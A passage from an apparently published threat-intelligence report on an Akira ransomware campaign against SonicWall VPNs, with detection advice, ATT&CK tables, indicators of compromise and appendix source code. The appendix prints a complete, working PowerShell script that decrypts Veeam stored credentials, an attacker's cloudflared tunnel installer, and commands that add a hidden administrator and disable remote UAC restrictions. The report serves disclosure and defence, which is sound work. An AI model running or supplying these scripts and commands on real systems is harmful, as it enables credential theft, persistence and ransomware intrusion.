To facilitate this process, we recommend monitoring for VPN logins originating from untrusted hosting\r\ninfrastructure. Equally important is ensuring visibility into internal networks, since lateral movement and ransomware\r\nencryption can occur within hours or even minutes of initial access. Monitoring for anomalous SMB activity indicative of\r\nImpacket use provides an additional early detection opportunity.\r\nWhen firewalls are confirmed to be running firmware versions vulnerable to credential access or full configuration export,\r\npatching alone is not enough. 
In such situations, credentials must be reset wherever possible, including MFA-related secrets\r\nthat might otherwise be thought of as secure, and Active Directory credentials with VPN access. These considerations are\r\nbest practices that apply regardless of which firewall products are in use.\r\nAs this campaign evolves, Arctic Wolf Labs will continue to collaborate with SonicWall and the wider security community\r\nto protect against related threats. In the meantime, organizations should consider the credential security of their firewalls and\r\nother edge devices as an essential part of their security posture, and the early detections described here should be considered to\r\nprotect against catastrophic impact.\r\nAcknowledgements\r\nArctic Wolf Labs would like to acknowledge and thank members of our Security Services team for their role in identifying\r\nand subsequently investigating the earliest intrusions associated with this campaign, especially Reid Hutchins and Michael\r\nMitra. We also thank Trevor Daher and Jerbin Kolencheril for their exhaustive efforts supporting investigations and documenting\r\nevidence across multiple weeks of this campaign.\r\nAppendix\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic | Technique | Sub-techniques or Tools\r\nInitial Access | T1133: External Remote Services; T1078: Valid Accounts | Compromised VPN Credentials\r\nDefense Evasion | T1562: Impair Defenses | BYOVD Use\r\nCredential Access | T1555: Credentials from Password Stores | Targeted Veeam Backup \u0026 Recovery to extract passwords from the configuration database.\r\nPersistence | T1136: Create Account | Akira affiliates create accounts named after popular services in order to blend into the environment:\r\nnet user sqlbackup REDACTED /add\r\nnet localgroup administrators sqlbackup /add\r\nPersistence | T1112: Modify Registry | Affiliates were observed modifying the registry to disable remote UAC restrictions:\r\nreg add\r\n\\”HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\S\r\n/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1\r\nPrivilege Escalation | T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control | Disabled remote UAC restrictions.\r\nDiscovery | T1046: Network Service Discovery | SoftPerfect Network Scanner; Advanced Port Scanner\r\nDiscovery | T1135: Network Share Discovery | SharpShares; Invoke-ShareFinder\r\nDiscovery | T1087.001/002 – Account Discovery: Domain \u0026 Local Account | Used PowerShell to enumerate local and domain accounts and attributes, writing them to disk as \u003cvictim\u003e_users.csv\r\nLateral Movement | T1021: Remote Services | T1021.001: Remote Desktop Protocol; T1021.002: SMB/Windows Admin Shares\r\nLateral Movement | T1570: Lateral Tool Transfer | PsExec\r\nCollection | T1560: Archive Collected Data | WinRAR\r\nCommand and Control | T1102: Web Service | Cloudflared\r\nCommand and Control | T1219: Remote Access Tools | Anydesk; Rustdesk; MeshAgent; Atera\r\nCommand and Control | T1572: Protocol Tunneling | Use of SSH tunneling\r\nExfiltration | | Rclone; WinSCP; FileZilla\r\nImpact | T1486: Data Encrypted for Impact | Akira ransomware encrypts files and appends the .akira extension to render data inaccessible to coerce ransom payment.\r\nImpact | T1657: Financial Theft | Akira employs a double extortion model, exfiltrating sensitive data and encrypting systems to pressure victims into paying ransom demands.\r\nImpact | T1490: Inhibit System Recovery | Akira ransomware deletes shadow copies, inhibiting system recovery.\r\nTools\r\nName | Description\r\nRustDesk | An open-source remote desktop tool which serves as an alternative to other products such as TeamViewer or AnyDesk.\r\nAnyDesk | Remote desktop tool that enables users to access and control devices from anywhere, supporting features like screen sharing and file transfer.\r\nMeshAgent | A remote management tool used by threat actors to execute commands, transfer files, manage accounts, and use remote desktop features like RDP and VNC.\r\nAtera | Remote monitoring and management tool that enables users to access and control devices.\r\nCrackMapExec | Open-source post-exploitation tool used by penetration testers to automate network assessments and post-exploitation tasks within large Active Directory environments, including credential validation, remote command execution, and lateral movement.\r\nKrbRelayUp | Open-source tool that enables local privilege escalation from a low-privileged domain user to SYSTEM on domain-joined Windows computers.\r\nImpacket | Open-source Python toolkit widely used in penetration testing to exploit Windows network services, perform credential extraction, remote command execution, and lateral movement within Active Directory environments.\r\nMobaXterm | Windows application that provides remote network tools, including SSH, RDP, VNC, FTP, and SFTP, allowing users to connect to and manage remote servers and systems.\r\nBloodHound | An open-source tool used by threat actors, penetration testers, and defenders to map and visualize relationships and attack paths within Active Directory environments, helping identify security misconfigurations and potential privilege escalation paths.\r\nSharpShares | Tool designed to enumerate all network shares within the current domain and resolve computer names to IP addresses.\r\nCobaltStrike | A penetration testing tool that allows threat actors to deploy customizable Beacons for command and control, perform lateral movement, escalate privileges, steal credentials, and deliver additional payloads.\r\nNetexec | An open-source tool used by threat actors to automate network discovery, credential validation, lateral movement, and post-exploitation tasks across multiple protocols like SMB, WinRM, LDAP, SSH, and RDP.\r\nldapdomaindump | Reconnaissance tool used by threat actors to extract, enumerate, and dump extensive information from Active Directory via LDAP, including users, groups, computers, and password-related attributes.\r\nCloudflared | Cloudflared is used by threat actors to create encrypted tunnels that allow persistent and covert access to compromised networks for data exfiltration, command execution, and remote control.\r\nAdvanced IP/Port Scanner | A network scanning tool that is leveraged by attackers to quickly identify open IP addresses, ports, and running services on a network.\r\nWinRAR | A tool used to archive files for easier exfiltration.\r\nSoftPerfect Netscan | Network scanning tool that threat actors use to discover live hosts, open ports, shared folders, and system information.\r\nrclone | A tool used by threat actors to exfiltrate data to remote servers.\r\nFileZilla | An open-source FTP application that threat actors use to exfiltrate data.\r\nIndicators of Compromise (IOCs)\r\nIndicator | ASN | Type | Description\r\n155.117.117[.]34 | AS215703 – ALEXANDRU VLAD trading as FREAKHOSTING | IPv4 Address | VPN Client IP\r\n45.66.249[.]93 | AS62005 – Bluevps Ou | IPv4 Address | VPN Client IP\r\n193.239.236[.]149 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n193.163.194[.]7 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n194.33.45[.]194 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n31.222.247[.]64 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n62.76.147[.]106 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n77.247.126[.]239 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n83.229.17[.]123 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n83.229.17[.]135 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n83.229.17[.]148 | AS62240 – Clouvider Limited | IPv4 Address | VPN Client IP\r\n45.55.76[.]210 | AS14061 – Digitalocean Llc | IPv4 Address | VPN Client IP\r\n38.114.123[.]167 | AS63023 – Gthost | IPv4 Address | VPN Client IP\r\n38.114.123[.]229 | AS63023 – Gthost | IPv4 Address | VPN Client IP\r\n107.155.93[.]154 | AS29802 – Hivelocity Inc. | IPv4 Address | VPN Client IP\r\n144.168.41[.]74 | AS29802 – Hivelocity Inc. | IPv4 Address | VPN Client IP\r\n91.191.214[.]170 | AS29802 – Hivelocity Inc. | IPv4 Address | VPN Client IP\r\n193.29.63[.]226 | AS63473 – Hosthatch Llc | IPv4 Address | VPN Client IP\r\n23.94.54[.]125 | AS36352 – Hostpapa | IPv4 Address | VPN Client IP\r\n185.33.86[.]2 | AS202015 – Hz Hosting Ltd | IPv4 Address | VPN Client IP\r\n79.141.160[.]33 | AS202015 – Hz Hosting Ltd | IPv4 Address | VPN Client IP\r\n79.141.173[.]235 | AS202015 – Hz Hosting Ltd | IPv4 Address | VPN Client IP\r\n185.181.230[.]108 | AS60602 – Inovare-Prim Srl | IPv4 Address | VPN Client IP\r\n207.188.6[.]17 | AS396356 – Latitude.Sh | IPv4 Address | VPN Client IP\r\n107.175.102[.]58 | AS131199 – Nexeon Technologies Inc. | IPv4 Address | VPN Client IP\r\n185.174.100[.]199 | AS8100 – Quadranet Enterprises Llc | IPv4 Address | VPN Client IP\r\n45.56.163[.]58 | AS8100 – Quadranet Enterprises Llc | IPv4 Address | VPN Client IP\r\n104.194.11[.]34 | AS23470 – Reliablesite.Net Llc | IPv4 Address | VPN Client IP\r\n104.194.8[.]58 | AS23470 – Reliablesite.Net Llc | IPv4 Address | VPN Client IP\r\n104.238.205[.]105 | AS23470 – Reliablesite.Net Llc | IPv4 Address | VPN Client IP\r\n172.86.96[.]42 | AS14956 – Routerhosting Llc | IPv4 Address | VPN Client IP\r\n144.172.110[.]103 | AS14956 – RouterHosting LLC | IPv4 Address | VPN Client IP\r\n144.172.110[.]37 | AS14956 – RouterHosting LLC | IPv4 Address | VPN Client IP\r\n144.172.110[.]49 | AS14956 – RouterHosting LLC | IPv4 Address | VPN Client IP\r\n185.168.208[.]102 | AS21249 – GLOBAL CONNECTIVITY SOLUTIONS LLP | IPv4 Address | VPN Client IP\r\n172.96.10[.]212 | AS64236 – Unreal Servers Llc | IPv4 Address | VPN Client IP\r\n107.158.128[.]106 | AS62904 – Eonix Corporation | IPv4 Address | VPN Client IP\r\n131.226.2[.]47 | AS40676 – Psychz Networks | IPv4 Address | VPN Client IP\r\n193.242.184[.]58 | AS215381 – ROCKHOSTER PRIVATE LIMITED | IPv4 Address | VPN Client IP\r\n95.164.145[.]158 | AS394814 – ISP4Life INC | IPv4 Address | VPN Client IP\r\n170.130.165[.]42 | AS62904 – Eonix Corporation | IPv4 Address | Command and Control\r\n162.210.196[.]101 | AS30633 – Leaseweb Usa Inc. | IPv4 Address | Exfiltration\r\n206.168.190[.]143 | AS14315 – 1gservers Llc | IPv4 Address | Exfiltration\r\nkali | N/A | Hostname | Threat actor workstation hostname\r\nWIN | N/A | Hostname | Threat actor workstation hostname\r\nDESKTOP-HPLM2TD | N/A | Hostname | Threat actor workstation hostname\r\nWINUTIL | N/A | Hostname | Threat actor workstation hostname\r\nDESKTOP-A2S6P81 | N/A | Hostname | Threat actor workstation hostname\r\nWIN-V1L65ED9I55 | N/A | Hostname | Threat actor workstation hostname\r\nWIN-5VVC95LFP2G | N/A | Hostname | Threat actor workstation hostname\r\nDESKTOP-EDE0RR5 | N/A | Hostname | Threat actor workstation hostname\r\nSERVER | N/A | Hostname | Threat actor workstation hostname\r\n16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0 | N/A | File – SHA256 | BYOVD: rwdrv.sys, churchill_driver.sys\r\n385c235f9f52c68ec4adc7ee07de26b84b108116 | N/A | File – SHA1 | check_hvci_admin\r\nbd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56 | N/A | File – SHA256 | hlpdrv.sys\r\nExcluded Locales from BYOVD DLL\r\nLocale Code | Language Name | Primary Country/Region Name\r\nru-RU | Russian | Russia\r\nru-BY | Russian | Belarus\r\nru-KG | Russian | Kyrgyzstan\r\nru-MD | Russian | Moldova\r\nru-UA | Russian | Ukraine\r\nkk-KZ | Kazakh | Kazakhstan\r\nky-KG | Kyrgyz | Kyrgyzstan\r\nuz-Cyrl | Uzbek (Cyrillic script) | Uzbekistan\r\nuz-Cyrl-UZ | Uzbek (Cyrillic script) | Uzbekistan\r\nuz-Latn | Uzbek (Latin script) | Uzbekistan\r\nuz-Latn-UZ | Uzbek (Latin script) | Uzbekistan\r\nuz-Arab | Uzbek (Arabic script) | Uzbekistan\r\naz-Cyrl | Azerbaijani (Cyrillic) | Azerbaijan\r\naz-Cyrl-AZ | Azerbaijani (Cyrillic) | Azerbaijan\r\naz-Latn | Azerbaijani (Latin) | Azerbaijan\r\naz-Latn-AZ | Azerbaijani (Latin) | Azerbaijan\r\nka-GE | Georgian | Georgia\r\nuk-UA | Ukrainian | Ukraine\r\ntg-Cyrl | Tajik (Cyrillic script) | Tajikistan\r\ntg-Cyrl-TJ | Tajik (Cyrillic script) | Tajikistan\r\ntk-TM | Turkmen | Turkmenistan\r\nhy-AM | Armenian | Armenia\r\nbe-BY | Belarusian | Belarus\r\nlt-LT | Lithuanian | Lithuania\r\nlv-LV | Latvian | Latvia\r\nro-MD | Romanian | Moldova\r\net-EE | Estonian | Estonia\r\nFull Source: Veeam Credential Extraction PowerShell Script\r\n#Requires -RunAsAdministrator\r\n#Requires -Version 5.1\r\n$ErrorActionPreference = 
\"Stop\"\r\n$env:PSReadlineHistorySavePath = $null\r\nfunction Get-EncryptionSalt {\r\n param([string]$veeamRegPath)\r\n $saltPaths = @(\r\n \"$veeamRegPath\\Data\",\r\n \"$veeamRegPath\",\r\n \"$veeamRegPath\\SqlSettings\",\r\n \"$veeamRegPath\\DBManager\",\r\n \"$veeamRegPath\\EnterpriseManager\",\r\n \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\\Data\",\r\n \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\"\r\n )\r\n foreach ($path in $saltPaths) {\r\n if (Test-Path $path) {\r\n $prop = Get-ItemProperty -Path $path -Name \"EncryptionSalt\" -ErrorAction SilentlyContinue\r\n if ($prop -and $prop.EncryptionSalt) {\r\n return $prop.EncryptionSalt\r\n }\r\n }\r\n }\r\n $configPath = \"C:\\ProgramData\\Veeam\\Backup\\Configuration\\Configuration.xml\"\r\n if (Test-Path $configPath) {\r\n $configContent = Get-Content $configPath -Raw\r\n if ($configContent -match '\u003cEncryptionSalt\u003e([^\u003c]+)\u003c/EncryptionSalt\u003e') {\r\n return $matches[1]\r\n }\r\n }\r\n Write-Host \"Encryption salt not found, continuing without it\" -ForegroundColor Yellow\r\n return $null\r\n}\r\nfunction Enable-PgTrustAuth {\r\n param(\r\n [string]$pgHbaPath,\r\n [ref]$BackupCreated\r\n )\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 22 of 29\n\nif (-not (Test-Path $pgHbaPath)) {\r\n Write-Host \"pg_hba.conf not found: $pgHbaPath\" -ForegroundColor Yellow\r\n return $false\r\n }\r\n $backupPath = \"$pgHbaPath.backup_$(Get-Date -Format 'yyyyMMdd_HHmmss')\"\r\n Copy-Item $pgHbaPath $backupPath -Force\r\n $BackupCreated.Value = $backupPath\r\n $trustRules = @(\r\n \"\",\r\n \"# Veeam Credential Recovery - Temp Trust Rules [Added $(Get-Date)]\",\r\n \"host all all 127.0.0.1/32 trust\",\r\n \"host all all ::1/128 trust\"\r\n )\r\n $currentContent = Get-Content $pgHbaPath\r\n $newContent = $trustRules + $currentContent\r\n $newContent | Set-Content $pgHbaPath -Force\r\n return 
$true\r\n}\r\nfunction Restore-PgConf {\r\n param(\r\n [string]$backupPath,\r\n [string]$pgHbaPath\r\n )\r\n if (Test-Path $backupPath) {\r\n Copy-Item $backupPath $pgHbaPath -Force -ErrorAction SilentlyContinue\r\n Remove-Item $backupPath -Force -ErrorAction SilentlyContinue\r\n }\r\n}\r\nfunction Get-PostgreSQLService {\r\n $services = Get-CimInstance -ClassName Win32_Service -Filter \"DisplayName LIKE '%PostgreSQL%'\"\r\n return $services | Select-Object -First 1\r\n}\r\nfunction Restart-PostgreSQL {\r\n $service = Get-PostgreSQLService\r\n if (-not $service) {\r\n Write-Host \"PostgreSQL service not found\" -ForegroundColor Yellow\r\n return $false\r\n }\r\n Restart-Service -Name $service.Name -Force\r\n $attempts = 0\r\n do {\r\n Start-Sleep -Seconds 2\r\n $serviceStatus = (Get-Service -Name $service.Name).Status\r\n $attempts++\r\n } until ($serviceStatus -eq 'Running' -or $attempts -ge 10)\r\n return ($serviceStatus -eq 'Running')\r\n}\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 23 of 29\n\nfunction Decrypt-VeeamPassword {\r\n param(\r\n [string]$encryptedPassword,\r\n [string]$saltbase\r\n )\r\n if ([string]::IsNullOrWhiteSpace($encryptedPassword)) {\r\n return \"\u003cEMPTY\u003e\"\r\n }\r\n try {\r\n if ($encryptedPassword.StartsWith(\"AQAA\")) {\r\n $data = [Convert]::FromBase64String($encryptedPassword)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $data,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n elseif ($encryptedPassword.StartsWith(\"VmVlY\")) {\r\n $allBytes = [Convert]::FromBase64String($encryptedPassword)\r\n if ($allBytes.Length -gt 37) {\r\n $payload = $allBytes[37..($allBytes.Length-1)]\r\n if ($saltbase) {\r\n try {\r\n $saltBytes = [Convert]::FromBase64String($saltbase)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $payload,\r\n 
$saltBytes,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n catch {\r\n # Continue without salt\r\n }\r\n }\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $payload,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n return \"\u003cINVALID FORMAT\u003e\"\r\n }\r\n else {\r\n # Handle Veeam 11 format with DPAPI without salt\r\n $data = [Convert]::FromBase64String($encryptedPassword)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $data,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 24 of 29\n\n}\r\n }\r\n catch {\r\n return \"\u003cDECRYPT ERROR: $($_.Exception.Message)\u003e\"\r\n }\r\n}\r\ntry {\r\n Write-Host \"`n=== Veeam Credential Recovery ===\" -ForegroundColor Cyan\r\n Write-Host \"Supports Veeam v11+ | MSSQL \u0026 PostgreSQL`n\"\r\n Add-Type -AssemblyName System.Security, System.Data, System.Text.Encoding\r\n # Try different registry paths for compatibility\r\n $veeamRegPath = \"HKLM:\\SOFTWARE\\Veeam\\Veeam Backup and Replication\"\r\n if (-not (Test-Path $veeamRegPath)) {\r\n $veeamRegPath = \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\"\r\n if (-not (Test-Path $veeamRegPath)) {\r\n throw \"Veeam installation not found in registry!\"\r\n }\r\n }\r\n # Detect database configuration location\r\n $dbConfigPath = \"$veeamRegPath\\DatabaseConfigurations\"\r\n $dbConfigFound = $false\r\n $DBProduct = \"Mssql\" # Default to MSSQL\r\n if (Test-Path $dbConfigPath) {\r\n # Veeam 12+ style configuration\r\n $dbConfigFound = $true\r\n $DBProduct = (Get-ItemProperty -Path $dbConfigPath -ErrorAction SilentlyContinue).SqlActiveConfigurati\r\n }\r\n else 
{\r\n # Check for Veeam 11 style configuration in root key\r\n $rootProps = Get-ItemProperty -Path $veeamRegPath -ErrorAction SilentlyContinue\r\n if ($rootProps -and $rootProps.SqlDatabaseName -and $rootProps.SqlServerName) {\r\n $dbConfigFound = $true\r\n $DBProduct = \"Mssql\"\r\n }\r\n }\r\n if (-not $dbConfigFound) {\r\n throw \"Database configuration not found!\"\r\n }\r\n Write-Host \"Database type: $DBProduct\" -ForegroundColor Yellow\r\n $saltbase = Get-EncryptionSalt $veeamRegPath\r\n $credentials = @()\r\n $pgTrustMethodUsed = $false\r\n $pgBackupPath = $null\r\n if ($DBProduct -eq \"Mssql\") {\r\n if ($dbConfigFound -and (Test-Path \"$dbConfigPath\\MsSql\")) {\r\n # Veeam 12+ configuration\r\n $SQLConfiguration = Get-ItemProperty -Path \"$dbConfigPath\\MsSql\" -ErrorAction Stop\r\n $SQLServer = $SQLConfiguration.SqlServerName\r\n $SQLInstance = $SQLConfiguration.SqlInstanceName\r\n $SQLDB = $SQLConfiguration.SqlDatabaseName\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 25 of 29\n\n}\r\n else {\r\n # Veeam 11 configuration\r\n $SQLConfiguration = Get-ItemProperty -Path $veeamRegPath -ErrorAction Stop\r\n $SQLServer = $SQLConfiguration.SqlServerName\r\n $SQLInstance = $SQLConfiguration.SqlInstanceName\r\n $SQLDB = $SQLConfiguration.SqlDatabaseName\r\n }\r\n $SQLConnection = if ($SQLInstance) { \"$SQLServer\\$SQLInstance\" } else { $SQLServer }\r\n try {\r\n $connString = \"Server=$SQLConnection;Database=$SQLDB;Integrated Security=SSPI;\"\r\n $conn = New-Object System.Data.SqlClient.SqlConnection($connString)\r\n $conn.Open()\r\n $cmdText = \"SELECT [user_name] AS [username], [password], [description] FROM [dbo].[Credentials]\"\r\n $cmd = New-Object System.Data.SqlClient.SqlCommand($cmdText, $conn)\r\n $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($cmd)\r\n $dataset = New-Object System.Data.DataSet\r\n $adapter.Fill($dataset) | Out-Null\r\n if ($dataset.Tables[0] -and 
$dataset.Tables[0].Rows.Count -gt 0) {\r\n $credentials = $dataset.Tables[0]\r\n }\r\n }\r\n finally {\r\n if ($conn.State -eq \"Open\") {\r\n $conn.Close()\r\n }\r\n }\r\n }\r\n elseif ($DBProduct -eq \"PostgreSql\") {\r\n $pgConfig = Get-ItemProperty -Path \"$dbConfigPath\\PostgreSql\" -ErrorAction Stop\r\n $pgPort = $pgConfig.SqlHostPort\r\n $pgDB = $pgConfig.SqlDatabaseName\r\n $psqlPath = Get-ChildItem -Path \"C:\\Program Files\\PostgreSQL\" -Recurse -Filter \"psql.exe\" |\r\n Where-Object { $_.FullName -match \"bin\\\\psql\\.exe\" } |\r\n Sort-Object { [version]($_.Directory.Parent.Name) } -Descending |\r\n Select-Object -First 1 -ExpandProperty FullName\r\n if (-not $psqlPath -or -not (Test-Path $psqlPath)) {\r\n throw \"psql.exe not found!\"\r\n }\r\n $pgDataDir = (Get-Item $psqlPath).Directory.Parent.FullName + \"\\data\"\r\n $pgHbaPath = Join-Path $pgDataDir \"pg_hba.conf\"\r\n if (Enable-PgTrustAuth $pgHbaPath ([ref]$pgBackupPath)) {\r\n if (Restart-PostgreSQL) {\r\n $pgTrustMethodUsed = $true\r\n $query = \"SELECT user_name AS username, password, description FROM credentials\"\r\n $credentials = \u0026 $psqlPath -h localhost -p $pgPort -U postgres -d $pgDB -c $query --csv 2\u003e$nul\r\n }\r\n }\r\n }\r\n else {\r\n throw \"Unsupported database: $DBProduct\"\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 26 of 29\n\n}\r\n if (-not $credentials -or ($credentials | Measure-Object).Count -eq 0) {\r\n throw \"No credentials found\"\r\n }\r\n $validCredentials = @()\r\n foreach ($cred in $credentials) {\r\n $decrypted = Decrypt-VeeamPassword $cred.password $saltbase\r\n if (-not [string]::IsNullOrWhiteSpace($decrypted) -and $decrypted -ne \"\u003cEMPTY\u003e\") {\r\n $validCredentials += [PSCustomObject]@{\r\n UserName = $cred.username\r\n Password = $decrypted\r\n Description = if ($cred.description) { $cred.description } else { \"\" }\r\n }\r\n }\r\n }\r\n if ($validCredentials.Count -eq 0) 
{\r\n Write-Host \"No valid credentials found\" -ForegroundColor Yellow\r\n }\r\n else {\r\n Write-Host \"`n=== Decrypted Credentials ===\" -ForegroundColor Green\r\n $validCredentials | Format-Table -Wrap -AutoSize\r\n }\r\n}\r\ncatch {\r\n Write-Host \"`nERROR: $($_.Exception.Message)\" -ForegroundColor Red\r\n}\r\nfinally {\r\n if ($pgTrustMethodUsed -and $pgBackupPath) {\r\n $pgDataDir = (Get-Item $psqlPath).Directory.Parent.FullName + \"\\data\"\r\n $pgHbaPath = Join-Path $pgDataDir \"pg_hba.conf\"\r\n Restore-PgConf $pgBackupPath $pgHbaPath\r\n Restart-PostgreSQL | Out-Null\r\n }\r\n}\r\nFull Source: CloudFlared Installation PowerShell Script\r\n# Set TLS 1.2 for secure downloads\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n# Alternative download URLs in case GitHub is blocked\r\n$msiUrl = 'https://github.com/cloudflare/cloudflared/releases/download/2025.6.0/cloudflared-windows-amd64.msi\r\n$exeUrl = 'https://github.com/cloudflare/cloudflared/releases/download/2025.6.0/cloudflared-windows-amd64.exe\r\n# Try multiple download methods\r\ntry {\r\n # Attempt download with progress\r\n Write-Host \"Downloading cloudflared MSI package...\"\r\n try {\r\n Invoke-WebRequest -Uri $msiUrl -OutFile 'cloudflared.msi' -UseBasicParsing\r\n } catch {\r\n Write-Host \"Primary download failed, trying alternative method...\"\r\n # Alternative download method using BITS\r\n Start-BitsTransfer -Source $msiUrl -Destination 'cloudflared.msi'\r\n }\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 27 of 29\n\n# Verify download\r\n if (-not (Test-Path 'cloudflared.msi')) {\r\n throw \"MSI download failed\"\r\n }\r\n # Install MSI silently\r\n Write-Host \"Installing cloudflared MSI package...\"\r\n Start-Process msiexec -ArgumentList \"/i `\"cloudflared.msi`\" /qn /log `\"$env:ProgramData\\cloudflared_msi_in\r\n # Download EXE version\r\n Write-Host \"Downloading cloudflared 
EXE...\"\r\n try {\r\n Invoke-WebRequest -Uri $exeUrl -OutFile 'cloudflared.exe' -UseBasicParsing\r\n } catch {\r\n Write-Host \"Primary download failed, trying alternative method...\"\r\n Start-BitsTransfer -Source $exeUrl -Destination 'cloudflared.exe'\r\n }\r\n # Verify download\r\n if (-not (Test-Path 'cloudflared.exe')) {\r\n throw \"EXE download failed\"\r\n }\r\n # Install service\r\n Write-Host \"Installing cloudflared service...\"\r\n Start-Process -FilePath \"$PWD\\cloudflared.exe\" -ArgumentList \"service install REDACTED_BASE64_TOKEN\" -Wait\r\n Write-Host \"Installation completed successfully.\"\r\n} catch {\r\n Write-Host \"An error occurred: $_\" -ForegroundColor Red\r\n exit 1\r\n}\r\nAdditional Resources\r\nGet actionable insights and access to the security operations expertise of one of the largest security operations centers\r\n(SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.\r\nLearn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and\r\nsecurity leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.\r\nAbout Arctic Wolf Labs\r\nArctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore\r\nsecurity topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat\r\ndetection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed,\r\nscale, and detection efficacy of Arctic Wolf’s solution offerings.\r\nWith their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s\r\ncustomer base, but the security community at large.\r\nAuthors\r\nStefan Hostetler\r\nStefan is a Lead Threat Intelligence Researcher at Arctic Wolf. 
With over a decade of industry experience under his belt, he\r\nfocuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.\r\nJulian Tuin\r\nJulian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has\r\nexperience in identifying and tracking campaigns for new and emerging threats.\r\nJon Grimm\r\nJon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable\r\nintelligence that enhances organizational defenses. He has a background of 10 years’ experience in several domains of\r\ncybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA,\r\nGCTI).\r\nTrevor Daher\r\nTrevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and\r\nResponse (MDR) service.\r\nJerbin Kolencheril\r\nJerbin Kolencheril is a Technical Lead within Arctic Wolf’s Security Services group supporting the Customer Security\r\nOperation Centre (cSOC). He has a Master’s degree in Information Security and brings years of experience into the role.\r\nAlyssa Newbury\r\nAlyssa Newbury is a Threat Intelligence Analyst at Arctic Wolf, with over a decade of experience in tactical threat\r\nintelligence and cybersecurity. She has a background working for various agencies within the intelligence community and\r\nfocuses primarily on researching and identifying emerging cyber threats and producing impactful finished intelligence\r\nproducts.\r\nJoe Wedderspoon\r\nJoe Wedderspoon is a Senior Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident\r\nresponse and digital forensic investigations. 
He holds multiple certifications and has over 7 years of operational experience\r\nin incident response, defensive cyber operations, and researching adversary tradecraft in both the public and private sectors.\r\nCole Pixley\r\nCole Pixley investigates cyber incidents as a Forensic Analyst with Arctic Wolf Incident Response. He has a bachelor’s\r\ndegree in Computer Forensics, holds multiple forensic certifications, and has extensive experience solving cyber\r\ninvestigations.\r\nSource: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/"
	],
	"report_names": [
		"smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
